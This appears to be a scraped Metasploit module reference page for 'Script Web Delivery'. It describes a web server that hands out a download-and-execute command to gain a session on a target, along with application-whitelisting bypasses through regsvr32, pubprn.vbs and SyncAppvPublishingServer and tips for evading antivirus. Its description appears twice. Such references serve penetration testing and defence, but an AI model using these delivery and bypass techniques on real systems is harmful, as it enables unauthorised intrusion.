module
Script Web Delivery
Disclosed | Created |
---|---|
07/19/2013 | 05/30/2018 |
Disclosed
07/19/2013
Created
05/30/2018
Description
This module quickly fires up a web server that serves a payload.
The module will provide a command to be run on the target machine
based on the selected target. The provided command will download
and execute a payload using either a specified scripting language
interpreter or "squiblydoo" via regsvr32.exe for bypassing
application whitelisting.
The main purpose of this module is to quickly establish a session on a
target machine when the attacker has to manually type in the command:
e.g. Command Injection, RDP Session, Local Access or maybe Remote
Command Execution.
This attack vector does not write to disk so it is less likely to
trigger AV solutions and will allow privilege escalations supplied
by Meterpreter.
When using either of the PSH targets, ensure the payload architecture
matches the target computer or use SYSWOW64 powershell.exe to execute
x86 payloads on x64 machines.
Regsvr32 uses "squiblydoo" technique to bypass application whitelisting.
The signed Microsoft binary file, Regsvr32, is able to request an .sct
file and then execute the included PowerShell command inside of it.
Similarly, the pubprn target uses the pubprn.vbs script to request and
execute a .sct file.
Both web requests (i.e., the .sct file and PowerShell download/execute)
can occur on the same port.
The SyncAppvPublishingServer target uses SyncAppvPublishingServer.exe
Microsoft signed binary to request and execute a PowerShell script. This
technique only works on Windows 10 builds
"PSH (Binary)" will write a file to the disk, allowing for custom binaries
to be served up to be downloaded and executed.
The module will provide a command to be run on the target machine
based on the selected target. The provided command will download
and execute a payload using either a specified scripting language
interpreter or "squiblydoo" via regsvr32.exe for bypassing
application whitelisting.
The main purpose of this module is to quickly establish a session on a
target machine when the attacker has to manually type in the command:
e.g. Command Injection, RDP Session, Local Access or maybe Remote
Command Execution.
This attack vector does not write to disk so it is less likely to
trigger AV solutions and will allow privilege escalations supplied
by Meterpreter.
When using either of the PSH targets, ensure the payload architecture
matches the target computer or use SYSWOW64 powershell.exe to execute
x86 payloads on x64 machines.
Regsvr32 uses "squiblydoo" technique to bypass application whitelisting.
The signed Microsoft binary file, Regsvr32, is able to request an .sct
file and then execute the included PowerShell command inside of it.
Similarly, the pubprn target uses the pubprn.vbs script to request and
execute a .sct file.
Both web requests (i.e., the .sct file and PowerShell download/execute)
can occur on the same port.
The SyncAppvPublishingServer target uses SyncAppvPublishingServer.exe
Microsoft signed binary to request and execute a PowerShell script. This
technique only works on Windows 10 builds
"PSH (Binary)" will write a file to the disk, allowing for custom binaries
to be served up to be downloaded and executed.
Authors
Andrew Smith "jakx" Ben Campbell Chris CampbellCasey SmithTrenton Iveyg0tmi1kbcoles Matt NelsonphraNick Landers
Platform
Linux,OSX,PHP,Python,Windows
References
Module Options
To display the available options, load the module within the Metasploit console and run the commands ‘show options’ or ‘show advanced’:
msf > use exploit/multi/script/web_delivery msf /(y) > show actions ...actions... msf /(y) > set ACTION < action-name > msf /(y) > show options ...show and set options... msf /(y) > run

NEW
Explore Exposure Command
Confidently identify and prioritize exposures from endpoint to cloud with full attack surface visibility and threat-aware risk context.